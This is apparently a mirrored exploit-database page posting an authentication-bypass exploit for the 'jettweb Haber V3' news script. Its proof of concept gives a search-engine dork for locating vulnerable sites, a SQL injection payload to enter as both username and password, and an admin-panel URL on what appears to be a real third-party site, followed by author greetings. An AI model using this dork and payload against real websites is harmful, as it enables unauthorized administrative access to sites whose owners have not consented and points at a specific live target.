yazılımı jettweb Haber V3 Auth By Pass Vulnerability - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1683001 漏洞类型
发布时间 2019-07-30 更新时间 2019-07-30
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019070147
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
====================================================================================================================================
| # Title     : yazılımı jettweb Haber V3 Auth By Pass Vulnerability                                                                            |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               |
| # Vendor    : http://haberv3.proemlaksitesi.net/                                                                                 |  
| # Dork      : "yazılımı jettweb"                                                                                                 |
====================================================================================================================================

poc :


[+] Dorking İn Google Or Other Search Enggine.

[+] Use payload : User & Pass : 1' or 1=1 -- -

[+] http://kocaeliden.net/yonetim/index.php?admin=fotoislemleri&syf=resimler&id=10


Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |
                                                                                                                                      |
=======================================================================================================================================